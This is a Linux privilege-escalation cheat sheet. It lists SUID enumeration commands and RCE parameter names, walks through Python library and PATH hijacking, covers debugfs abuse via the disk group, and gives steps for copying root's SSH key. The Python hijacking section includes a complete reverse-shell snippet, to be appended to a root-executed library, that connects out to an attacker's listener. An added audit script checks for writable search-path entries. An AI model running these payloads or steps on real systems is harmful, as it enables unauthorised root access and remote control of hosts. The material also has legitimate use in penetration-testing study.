Linux checklist and commands

Mostly we use scripts such as linpeas, linenum and Linux Exploit Suggester to do the privesc, but here are some things we can check manually.

CHECKLIST

  • Linux kernel exploits

  • check scripts with both SUID <root & owned user>

  • check if there is an "exec()" function call available in the script

  • check if there is a "nohup()" function call available in the script

  • check binaries with both SUID <root & owned user>

  • check that binary on GTFOBins

  • check source code files & do source code analysis

  • try to write an ssh key into /root/.ssh

  • check MySQL files

  • try to write a cronjob

  • check the .bash_history file

  • Python library hijacking

find command

Find SUID and SGID files (the parentheses are needed so that -type f applies to both -perm tests, and stderr goes to /dev/null, not /dev/nul):

find / -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null

find / -perm -u=s 2>/dev/null

find / -perm -o+w 2>/dev/null

users and groups

check groups with:

id

RCE parameters
Top 25 Remote Code Execution (RCE) Parameters [GET based]

?cmd=
?exec=
?command=
?execute=
?ping=
?query=
?jump=
?code=
?reg=
?do=
?func=
?arg=
?option=
?load=
?process=
?step=
?read=
?function=
?req=
?feature=
?exe=
?module=
?payload=
?run=
?print=
Python library hijacking

  1. find a script which is executed by root by any means (cronjob or something else...)

  2. check whether the script imports any library, e.g. "import os"

  3. find the library file on the system and check whether it is writable or not

find / -type f -name os.py -ls
or
locate os.py

common locations >>

/usr/lib/python2.7/
/usr/local/lib/python2.7/
/usr/lib/python3/
/usr/lib/python3.0/
/usr/local/lib/python3.0/
  4. Insert a reverse shell at the bottom of the file (the original snippet called os.dup2 / os.putenv without importing os; lhost and lport are placeholders for the listener address and port and must be set before use)

import os
import pty
import socket

# lhost / lport: listener address and port (placeholders, set them before use)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((lhost, lport))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
os.putenv("HISTFILE", '/dev/null')
pty.spawn("/bin/bash")
s.close()
environment PATH hijacking

We can also use the PATH variable to escalate our privileges to the next level:

  1. check if any binary is directly executable by us {for example :- gzip, unzip, tar, base64, etc.}

  2. check the path of the binary :- which gzip, and the value of the PATH variable :- echo $PATH

  3. make a file with the same binary name & inject your payload / rev_shell inside it

  4. insert your current location into the PATH variable (the variable name is case-sensitive, so it is $PATH, not $path) :- export PATH=.:$PATH

  5. execute it
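Both the Python library hijacking section and the PATH hijacking section above come down to one question a defender can audit directly: is any directory on a search path writable by an unprivileged user, or relative (so it resolves to the current directory)? The script below is an added example, not part of the original notes; it assumes a Linux host, checks the live $PATH and sys.path, and flags the module names the write-up imports (os, pty, socket) when a non-root user could overwrite them.

```python
import os
import stat
import sys

# Module names the hijacking write-up above imports; a writable copy of any of
# them on sys.path is the "writable library" it looks for.
WATCHED = ("os.py", "pty.py", "socket.py")


def entry_issues(entry: str) -> list[str]:
    """Why one PATH / sys.path entry could be hijacked; [] means it looks fine."""
    if entry == "" or not os.path.isabs(entry):
        # "" and "." both resolve to the current working directory, which is
        # exactly what `export PATH=.:$PATH` relies on.
        return ["relative entry resolves to the current directory"]
    if not os.path.isdir(entry):
        return ["directory does not exist"]
    issues = []
    mode = os.stat(entry).st_mode
    if mode & stat.S_IWOTH and not mode & stat.S_ISVTX:
        issues.append("world-writable without sticky bit")
    if os.geteuid() != 0 and os.access(entry, os.W_OK):
        issues.append("writable by the current non-root user")
    return issues


def writable_modules(directory: str) -> list[str]:
    """Watched module files under `directory` that a non-root user could edit."""
    if os.geteuid() == 0:
        return []  # root can write anything; the check only means something unprivileged
    paths = (os.path.join(directory, name) for name in WATCHED)
    return [p for p in paths if os.path.isfile(p) and os.access(p, os.W_OK)]


def audit(entries) -> dict[str, list[str]]:
    """Map each weak search-path entry (and writable watched module) to its issues."""
    report = {e: issues for e in entries if (issues := entry_issues(e))}
    for entry in entries:
        for module in writable_modules(entry):
            report.setdefault(module, []).append("module file writable by current user")
    return report


if __name__ == "__main__":
    # Live check: $PATH (the hijacking target above) plus this interpreter's sys.path.
    live = os.environ.get("PATH", "").split(os.pathsep) + sys.path
    for entry, issues in audit(live).items():
        print(f"{entry}: {', '.join(issues)}")
```

A clean host prints nothing; any line it does print is a directory to chmod o-w (or to drop from the path) before a cron job or SUID helper searches it.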

restricted shell escape

Disk partition

Exploitation

Step 1: Check if there is disk partition available or not.

Step 2: List available disk partitions.

Step 3: Use debugfs to read files with granted permissions

https://vk9-sec.com/disk-group-privilege-escalation/?source=post_page-----b14a6e535e1f--------------------------------

USBCreator D-Bus privilege escalation via ssh

  1. copy the victim (root) ssh key into the /tmp directory

  2. copy the attacker ssh key into the victim's /root/.ssh
